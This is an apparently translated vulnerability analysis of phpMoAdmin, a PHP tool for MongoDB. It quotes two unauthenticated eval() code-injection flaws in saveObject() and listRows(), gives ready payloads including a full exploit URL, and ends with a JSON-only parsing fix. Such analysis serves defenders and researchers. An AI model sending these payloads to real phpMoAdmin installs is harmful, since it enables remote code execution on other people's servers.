PhpMoAdmin Vulnerability Analysis Report
PhpMoAdmin is a web-based MongoDB management tool: a single PHP application that can create, delete and modify databases and indexes, provides data viewing and search tools, shows statistics such as server uptime and memory usage, and supports importing and exporting JSON data.
Recently a researcher going by the handle sp1nlock disclosed an arbitrary code execution vulnerability in phpMoAdmin that can lead to the compromise of any host running the management program.
A quick follow-up analysis by a researcher at the Alibaba defense lab found a second, similar remote code execution vulnerability (0-day) in the same application.
0x01 Public vulnerability analysis
The vulnerable file, moadmin.php, performs no login authentication, so every entry point discussed below is reachable without credentials.
The relevant part of the constructor:

    public function __construct() {
        // ... several lines omitted ...
        $action = (isset($_GET['action']) ? $_GET['action'] : 'listcollections');
        if (isset($_POST['object'])) {
            // the raw POST value is passed straight into saveObject()
            if (self::$model->saveObject($_GET['collection'], $_POST['object'])) {
                return $this->_dumpFormVals();
            }
        }
        // ...
    }

The saveObject() function:

    public function saveObject($collection, $obj) {
        eval('$obj = ' . $obj . ';');   // $obj is attacker-controlled and is executed as PHP source
        return $this->mongo->selectCollection($collection)->save($obj);
    }
0x02 Exploitation
Send a POST request with the parameter object=1;phpinfo(); and the injected phpinfo() call is executed by the eval() in saveObject().
0x03 0-day analysis
The program has a second arbitrary code execution vulnerability, in the listRows() function (lines 552-557):

    public function listRows($collection) {
        foreach ($this->sort as $key => $val) {
            // cast vals to int
            $sort[$key] = (int) $val;
        }
        $col  = $this->mongo->selectCollection($collection);
        $find = array();
        if (isset($_GET['find']) && $_GET['find']) {        // the find variable comes from the GET request
            $_GET['find'] = trim($_GET['find']);
            if (strpos($_GET['find'], 'array') === 0) {    // only checks that the value starts with "array"
                eval('$find = ' . $_GET['find'] . ';');    // vulnerable: the rest of the string is executed as PHP
            } else if (is_string($_GET['find'])) {
                if ($findArr = json_decode($_GET['find'], true)) {
                    $find = $findArr;
                }
            }
        }
        // ...
    }
0x04 0-day exploitation
There is nothing more to it: search the source for the two eval() sites and write the payload directly into the parameter. http://ip/moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;
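Both eval() sites above (saveObject() in 0x01 and listRows() in 0x03) exist only to turn a user-supplied string into a PHP array. As an added example, not phpMoAdmin's own code and not the project's fix, the following shows how the same `find` and `object` parameters can be accepted as JSON only, so no request data ever reaches eval(); the function names, limits and sample inputs are assumptions for this illustration.

```php
<?php
declare(strict_types=1);

/**
 * Decode a request parameter that must be a JSON object/array.
 * Replaces the eval('$x = ' . $input . ';') pattern: json_decode() never
 * executes code, the depth limit bounds parser recursion, and anything that
 * is not a JSON object (including PHP syntax such as "array(); phpinfo();")
 * is rejected instead of being silently accepted.
 *
 * @throws InvalidArgumentException|JsonException on bad input
 */
function decodeJsonParam(string $name, string $input, int $maxLen = 4096): array
{
    $input = trim($input);
    if ($input === '' || strlen($input) > $maxLen) {
        throw new InvalidArgumentException("$name: empty or longer than $maxLen bytes");
    }
    // assoc=true yields a PHP array, which is what the Mongo driver expects
    $decoded = json_decode($input, true, 32, JSON_THROW_ON_ERROR);
    if (!is_array($decoded)) {
        throw new InvalidArgumentException("$name: must be a JSON object, got " . gettype($decoded));
    }
    return $decoded;
}

// Drop-in replacements for the two vulnerable paths (assumed names).
function parseFindFilter(string $rawFind): array
{
    return decodeJsonParam('find', $rawFind);
}

function parseObjectToSave(string $rawObject): array
{
    return decodeJsonParam('object', $rawObject);
}

// Constructed inputs: a legitimate JSON filter, the report's listRows payload,
// and the report's saveObject payload.
$inputs = [
    '{"name": "secpulse"}',
    'array();phpinfo();exit;',
    '1;phpinfo();',
];
foreach ($inputs as $raw) {
    try {
        $ok = parseFindFilter($raw);
        echo "accepted: " . json_encode($ok) . PHP_EOL;
    } catch (InvalidArgumentException | JsonException $e) {
        echo "rejected: " . $e->getMessage() . PHP_EOL;
    }
}
```

The first input is accepted as a filter; the two exploit strings are rejected by the JSON parser before any database or interpreter call is made.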